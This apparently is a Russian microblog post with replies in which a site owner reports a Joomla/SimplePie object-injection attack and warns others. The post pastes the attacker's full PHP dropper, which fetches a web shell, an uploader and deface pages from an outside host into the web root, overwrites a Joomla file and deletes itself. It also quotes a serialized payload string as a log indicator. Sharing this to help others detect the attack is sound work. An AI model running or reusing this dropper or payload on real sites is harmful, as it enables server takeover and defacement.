@Rumpelstilzchen

Rumpelstilzchen

Румпельштильцхен
Rumpelstilzchen

Дата рождения: 21.01.1924

0 я читаю 30 меня читают
588 постов
1890 комментариев
Rumpelstilzchen
09 Oct 2017

Опять кулхацкеры вылезли. Снова пытаются через SimplePie хакать.

Вот такой вот код выполнить хотят

"<?php
function http_get($url){
$im = curl_init($url);
curl_setopt($im, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($im, CURLOPT_CONNECTTIMEOUT, 10);
curl_setopt($im, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($im, CURLOPT_HEADER, 0);
return curl_exec($im);
curl_close($im);
}
$check = $_SERVER['DOCUMENT_ROOT'] . "/tmp/vip.php" ;
$text = http_get('http://kylebufis.com/vip/vip.txt');
$open = fopen($check, 'w');
fwrite($open, $text);
fclose($open);
if(file_exists($check)){
echo $check."</br>";
}else
echo "not exits";
echo "done .\n " ;
$check2 = $_SERVER['DOCUMENT_ROOT'] . "/tmp/upxx.php" ;
$text2 = http_get('http://kylebufis.com/vip/uploader.txt');
$open2 = fopen($check2, 'w');
fwrite($open2, $text2);
fclose($open2);
if(file_exists($check2)){
echo $check2."</br>";
}else
echo "not exits2";
echo "done2 .\n " ;

$check3=$_SERVER['DOCUMENT_ROOT'] . "/x.txt" ;
$text3 = http_get('http://kylebufis.com/vip/deface.txt');
$op3=fopen($check3, 'w');
fwrite($op3,$text3);
fclose($op3);

$check4=$_SERVER['DOCUMENT_ROOT'] . "/tmp/check.php" ;
$text4 = http_get('http://kylebufis.com/vip/check.txt');
$op4=fopen($check4, 'w');
fwrite($op4,$text4);
fclose($op4);

$check5=$_SERVER['DOCUMENT_ROOT'] . "/x.php" ;
$text5 = http_get('http://kylebufis.com/vip/deface.txt');
$op5=fopen($check5, 'w');
fwrite($op5,$text5);
fclose($op5);

$check6=$_SERVER['DOCUMENT_ROOT'] . "/libraries/joomla/session/session.php" ;
$text6 = http_get('#');
$op6=fopen($check6, 'w');
fwrite($op6,$text6);
fclose($op6);

@unlink(FILE);

?>

Рекомендую почекаться в логах на "}__test|O:21:\"JDatabaseDriverMysqli\":3:{s:2:\"fc\";O:17:\"JSimplepieFactory\":0:{}s:21:\"\0\0\0disconnectHandlers\";a:1:{i:0;a:2:{i:0;O:9:\"SimplePie\":5:{s:8:\"sanitize\";O:20:\"JDatabaseDriverMysql\":0:{}s:8:\"feed_url\";s:2934:\"eval"

09 Oct 2017

У тебя ``` не пропечаталось в начале и конце.

09 Oct 2017

А что это за фиговина и есть ли она по дефолту?

09 Oct 2017

Это компонент RSS в Джумле, парсер XML. Да он там есть, вот только эксполйт который хацкер юзает двухлетней давности.
Зато если посмотреть он там тааакой скрипт залить пытается - закачаешься - http://kylebufis.com/vip/vip.txt http://kylebufis.com/vip/vip.txt''

#ozpgw/3 в ответ на /2
09 Oct 2017

Название «SimplePie» навело меня на мысль о каком-нибудь генераторе графиков %)

Ну, старым жумлам ничего не поможет. Только бэкапы :)

#ozpgw/4 в ответ на /3

Добавить пост

Вы можете выбрать до 10 файлов общим размером не более 10 МБ.
Для форматирования текста используется Markdown.